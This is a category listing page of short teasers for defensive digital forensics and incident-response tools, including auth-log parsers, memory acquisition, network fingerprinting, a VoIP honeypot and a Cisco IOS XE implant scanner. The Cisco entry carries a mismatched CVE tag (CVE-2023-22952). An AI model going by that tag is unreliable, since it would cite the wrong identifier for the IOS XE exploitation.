Category: Forensics

analyzing Linux authentication logs

AuthLogParser: analyzing Linux authentication logs

AuthLogParser AuthLogParser is a powerful Digital Forensics and Incident Response tool designed specifically for analyzing Linux authentication logs, commonly known as auth.log. This tool serves as an invaluable asset for Incident Responders, streamlining the...

DFIR automation tool

ForensicMiner: PowerShell-based DFIR automation tool

ForensicMiner ForensicMiner, a PowerShell-based DFIR automation tool, revolutionizes the field of digital investigations. Designed for efficiency, it automates artifact and evidence collection from Windows machines. Compatibility with Flacon Crowdstrike RTR and Palo Alto Cortex...

network fingerprinting

JA4+: A suite of network fingerprinting standards

JA4+ Network Fingerprinting JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine-readable to facilitate more effective threat-hunting and analysis....

linux memory acquisition

Linpmem: A Linux memory acquisition tool

Linpmem — a physical memory acquisition tool for Linux Linpmem is a Linux x64-only tool for reading physical memory. Like its Windows counterpart, Winpmem, this is not a traditional memory dumper. Linpmem offers an API...

VoIP honeypot

WhisperPot: create a comprehensive VoIP honeypot system

WhisperPot WhisperPot is an ongoing project aimed at creating a comprehensive VoIP honeypot system. It is designed to log attack attempts and identify potential threats and vulnerabilities in VoIP systems. WhisperPot simulates a realistic...

CVE-2023-22952

Cisco IOS XE implant scanning & detection

Cisco IOS XE implant scanning This repository contains information regarding post-exploitation activities linked to the Cisco IOS XE Software Web Management User Interface mass exploitations. Cisco Talos published a fingerprint that could check if...

PowerShell Log Analyzer

z9: PowerShell Log Analyzer

z9 PowerShell Log Analyzer This tool detects the artifact of the PowerShell-based malware from the eventlog of PowerShell logging. The strength of PowerShell scripts lies in their ability to run without touching the file...